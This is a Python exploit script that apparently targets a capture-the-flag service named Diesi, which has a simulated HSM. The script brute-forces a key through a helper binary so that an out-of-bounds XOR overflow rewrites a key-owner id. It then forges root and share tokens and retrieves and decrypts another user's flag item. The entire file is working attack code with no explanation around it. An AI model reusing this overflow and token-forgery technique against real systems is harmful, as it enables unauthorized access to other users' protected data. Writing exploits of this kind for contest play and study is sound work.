2-xor-oob.py

#!/usr/bin/env python3

import json
import os
import struct
import subprocess
import sys

from hsmutil import *
from interactions import Diesi


# 2 is fast but may miss some flags
# 3 is slower but should always be sufficient
BOF_SIZE = 3


def crack_key(key_size: int, offset: int, target: bytes) -> bytes:
    root = os.path.dirname(os.path.realpath(__file__))
    out = subprocess.check_output(
        [f'{root}/crack_key', str(key_size), str(offset), target.hex()])
    key = bytes.fromhex(out.decode())
    return key


def exploit(host: str, flag_id: str) -> str:
    flag_id_d = json.loads(flag_id)
    flag_key_id, flag_item_id = int(flag_id_d['key_id']), int(flag_id_d['item_id'])

    client = Diesi(host)
    client.register_checked(rand_username(), rand_password())

    target_key, = rand_keys(1)
    target_key_id = client.hsm_import_key(target_key)

    # Find key such that overflow turns owner id into target_key_id
    print('Searching for exploit key...')
    starting_owner_key_id = struct.pack('<I', flag_key_id)
    target_owner_key_id = struct.pack('<I', target_key_id)
    keystream_target = bytes(a ^ b for a, b in zip(starting_owner_key_id, target_owner_key_id))
    exploit_key = crack_key(32, 4 - BOF_SIZE, keystream_target[:BOF_SIZE])

    exploit_client = Diesi(host)
    exploit_client.register_checked(rand_username(), rand_password())

    exploit_key_id = exploit_client.hsm_import_key(exploit_key)

    token = make_root_token(target_key_id, flag_item_id, target_key)
    token = make_share_token(exploit_key_id, token, target_key)
    token = finalize_token(token, exploit_key, b'A'*(4 - BOF_SIZE))

    item = exploit_client.hsm_get_item(flag_item_id, token)
    item = decrypt_item(item, exploit_key)

    return item.decode()


if __name__ == '__main__':
    host, flag_id = sys.argv[1:3]
    flag = exploit(host, flag_id)
    print(flag)